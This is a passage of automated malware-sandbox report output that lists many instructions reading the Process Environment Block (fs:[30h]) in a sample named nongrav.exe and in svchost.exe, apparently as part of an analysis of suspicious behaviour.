Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]	15_2_1EACB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h]	15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h]	15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]	15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]	15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]	15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]	15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB541E8 mov eax, dword ptr fs:[00000030h]	15_2_1EB541E8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]	15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]	15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]	15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov ecx, dword ptr fs:[00000030h]	15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]	15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]	15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8E539 mov eax, dword ptr fs:[00000030h]	15_2_1EB8E539
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB4A537 mov eax, dword ptr fs:[00000030h]	15_2_1EB4A537
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98D34 mov eax, dword ptr fs:[00000030h]	15_2_1EB98D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]	15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]	15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]	15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]	15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov ecx, dword ptr fs:[00000030h]	15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]	15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]	15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]	15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h]	15_2_1EAF513A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h]	15_2_1EAF513A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]	15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACAD30 mov eax, dword ptr fs:[00000030h]	15_2_1EACAD30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]	15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]	15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]	15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACC962 mov eax, dword ptr fs:[00000030h]	15_2_1EACC962
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h]	15_2_1EAEC577
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h]	15_2_1EAEC577
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h]	15_2_1EACB171
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h]	15_2_1EACB171
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h]	15_2_1EAEB944
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h]	15_2_1EAEB944
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB03D43 mov eax, dword ptr fs:[00000030h]	15_2_1EB03D43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB43540 mov eax, dword ptr fs:[00000030h]	15_2_1EB43540
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE7D50 mov eax, dword ptr fs:[00000030h]	15_2_1EAE7D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF5BA5 mov eax, dword ptr fs:[00000030h]	22_2_03AF5BA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE138A mov eax, dword ptr fs:[00000030h]	22_2_03AE138A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A31B8F mov eax, dword ptr fs:[00000030h]	22_2_03A31B8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A31B8F mov eax, dword ptr fs:[00000030h]	22_2_03A31B8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADD380 mov ecx, dword ptr fs:[00000030h]	22_2_03ADD380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5B390 mov eax, dword ptr fs:[00000030h]	22_2_03A5B390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h]	22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h]	22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h]	22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A24F2E mov eax, dword ptr fs:[00000030h]	22_2_03A24F2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A24F2E mov eax, dword ptr fs:[00000030h]	22_2_03A24F2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5E730 mov eax, dword ptr fs:[00000030h]	22_2_03A5E730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF070D mov eax, dword ptr fs:[00000030h]	22_2_03AF070D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF070D mov eax, dword ptr fs:[00000030h]	22_2_03AF070D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE131B mov eax, dword ptr fs:[00000030h]	22_2_03AE131B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABFF10 mov eax, dword ptr fs:[00000030h]	22_2_03ABFF10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABFF10 mov eax, dword ptr fs:[00000030h]	22_2_03ABFF10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2DB60 mov ecx, dword ptr fs:[00000030h]	22_2_03A2DB60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3FF60 mov eax, dword ptr fs:[00000030h]	22_2_03A3FF60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8F6A mov eax, dword ptr fs:[00000030h]	22_2_03AF8F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A53B7A mov eax, dword ptr fs:[00000030h]	22_2_03A53B7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A53B7A mov eax, dword ptr fs:[00000030h]	22_2_03A53B7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2DB40 mov eax, dword ptr fs:[00000030h]	22_2_03A2DB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3EF40 mov eax, dword ptr fs:[00000030h]	22_2_03A3EF40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8B58 mov eax, dword ptr fs:[00000030h]	22_2_03AF8B58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2F358 mov eax, dword ptr fs:[00000030h]	22_2_03A2F358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]	22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]	22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]	22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]	22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]	22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]	22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]	22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]	22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA46A7 mov eax, dword ptr fs:[00000030h]	22_2_03AA46A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5FAB0 mov eax, dword ptr fs:[00000030h]	22_2_03A5FAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABFE87 mov eax, dword ptr fs:[00000030h]	22_2_03ABFE87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5D294 mov eax, dword ptr fs:[00000030h]	22_2_03A5D294
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5D294 mov eax, dword ptr fs:[00000030h]	22_2_03A5D294
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A376E2 mov eax, dword ptr fs:[00000030h]	22_2_03A376E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A516E0 mov ecx, dword ptr fs:[00000030h]	22_2_03A516E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A68EC7 mov eax, dword ptr fs:[00000030h]	22_2_03A68EC7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A536CC mov eax, dword ptr fs:[00000030h]	22_2_03A536CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADFEC0 mov eax, dword ptr fs:[00000030h]	22_2_03ADFEC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8ED6 mov eax, dword ptr fs:[00000030h]	22_2_03AF8ED6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2E620 mov eax, dword ptr fs:[00000030h]	22_2_03A2E620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADFE3F mov eax, dword ptr fs:[00000030h]	22_2_03ADFE3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h]	22_2_03A2C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h]	22_2_03A2C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h]	22_2_03A2C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A43A1C mov eax, dword ptr fs:[00000030h]	22_2_03A43A1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADB260 mov eax, dword ptr fs:[00000030h]	22_2_03ADB260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADB260 mov eax, dword ptr fs:[00000030h]	22_2_03ADB260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8A62 mov eax, dword ptr fs:[00000030h]	22_2_03AF8A62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3766D mov eax, dword ptr fs:[00000030h]	22_2_03A3766D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]	22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]	22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]	22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]	22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]	22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6927A mov eax, dword ptr fs:[00000030h]	22_2_03A6927A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h]	22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h]	22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h]	22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h]	22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]	22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]	22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]	22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]	22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]	22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]	22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A535A1 mov eax, dword ptr fs:[00000030h]	22_2_03A535A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5A185 mov eax, dword ptr fs:[00000030h]	22_2_03A5A185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4C182 mov eax, dword ptr fs:[00000030h]	22_2_03A4C182
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]	22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]	22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]	22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]	22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]	22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5FD9B mov eax, dword ptr fs:[00000030h]	22_2_03A5FD9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5FD9B mov eax, dword ptr fs:[00000030h]	22_2_03A5FD9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]	22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]	22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]	22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AD8DF1 mov eax, dword ptr fs:[00000030h]	22_2_03AD8DF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h]	22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h]	22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h]	22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h]	22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov ecx, dword ptr fs:[00000030h]	22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2AD30 mov eax, dword ptr fs:[00000030h]	22_2_03A2AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]	22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8D34 mov eax, dword ptr fs:[00000030h]	22_2_03AF8D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AAA537 mov eax, dword ptr fs:[00000030h]	22_2_03AAA537
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h]	22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h]	22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h]	22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5513A mov eax, dword ptr fs:[00000030h]	22_2_03A5513A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5513A mov eax, dword ptr fs:[00000030h]	22_2_03A5513A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h]	22_2_03A29100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h]	22_2_03A29100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h]	22_2_03A29100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B171 mov eax, dword ptr fs:[00000030h]	22_2_03A2B171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B171 mov eax, dword ptr fs:[00000030h]	22_2_03A2B171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4C577 mov eax, dword ptr fs:[00000030h]	22_2_03A4C577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4C577 mov eax, dword ptr fs:[00000030h]	22_2_03A4C577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4B944 mov eax, dword ptr fs:[00000030h]	22_2_03A4B944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4B944 mov eax, dword ptr fs:[00000030h]	22_2_03A4B944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A63D43 mov eax, dword ptr fs:[00000030h]	22_2_03A63D43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA3540 mov eax, dword ptr fs:[00000030h]	22_2_03AA3540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A47D50 mov eax, dword ptr fs:[00000030h]	22_2_03A47D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A690AF mov eax, dword ptr fs:[00000030h]	22_2_03A690AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5F0BF mov ecx, dword ptr fs:[00000030h]	22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5F0BF mov eax, dword ptr fs:[00000030h]	22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5F0BF mov eax, dword ptr fs:[00000030h]	22_2_03A5F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29080 mov eax, dword ptr fs:[00000030h]	22_2_03A29080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA3884 mov eax, dword ptr fs:[00000030h]	22_2_03AA3884
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA3884 mov eax, dword ptr fs:[00000030h]	22_2_03AA3884
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE14FB mov eax, dword ptr fs:[00000030h]	22_2_03AE14FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]	22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]	22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]	22_2_03AA6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8CD6 mov eax, dword ptr fs:[00000030h]	22_2_03AF8CD6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]	22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov ecx, dword ptr fs:[00000030h]	22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]	22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]	22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]	22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]	22_2_03ABB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h]	22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h]	22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h]	22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h]	22_2_03A3B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5BC2C mov eax, dword ptr fs:[00000030h]	22_2_03A5BC2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h]	22_2_03AA6C0A
